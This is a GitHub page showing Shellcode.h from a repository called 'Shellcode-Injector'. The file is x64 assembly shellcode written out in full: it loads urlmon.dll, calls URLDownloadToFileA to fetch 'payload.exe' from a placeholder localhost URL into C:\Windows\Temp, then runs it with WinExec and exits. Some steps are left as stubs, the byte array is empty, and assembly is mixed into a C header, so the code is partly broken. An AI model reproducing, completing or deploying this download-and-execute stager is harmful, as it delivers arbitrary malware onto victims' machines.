Shellcode-Injector/Shellcode.h at main · vvswift/Shellcode-Injector · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#pragma once
#include <cstddef>

// SHELLCODE_START
    ;
    push rdx
    xor rcx, rcx
    mov rdx, (dll_list_ptr)         ; stub: PEB

    ;
    lea rcx, [rip + urlmon_str]
    call rax                        ; LoadLibraryA("urlmon.dll") → hUrlMon in rax

    ;
    mov rcx, rax                    ; hUrlMon
    lea rdx, [rip + download_str]   ; "URLDownloadToFileA"
    call rbx                        ; GetProcAddress → rax

    ;
    lea rcx, [rip + url_str]        ; "http://localhost/payload.exe"
    lea rdx, [rip + dest_str]       ; "C:\\Windows\\Temp\\payload.exe"
    xor r8, r8                      ; Reserved = 0
    xor r9, r9                      ; Reserved = 0
    call rax                        ; URLDownloadToFileA

    ;
    lea rcx, [rip + dest_str]
    mov edx, 1                      ; SW_SHOWNORMAL
    ; Get WinExec the same way (LoadLibraryA&GetProcAddress as above) into rax
    call rax

    ;
    xor rcx, rcx
    ; Get ExitProcess into rax
    call rax

    ret

// SHELLCODE_END

static const unsigned char code[] = {
    // BYTES_BEGIN
    // BYTES_END
};

static const size_t codeSize = sizeof(code);

urlmon_str:    db "urlmon.dll",0
download_str:  db "URLDownloadToFileA",0
url_str:       db "http://localhost/payload.exe",0
dest_str:      db "C:\\Windows\\Temp\\payload.exe",0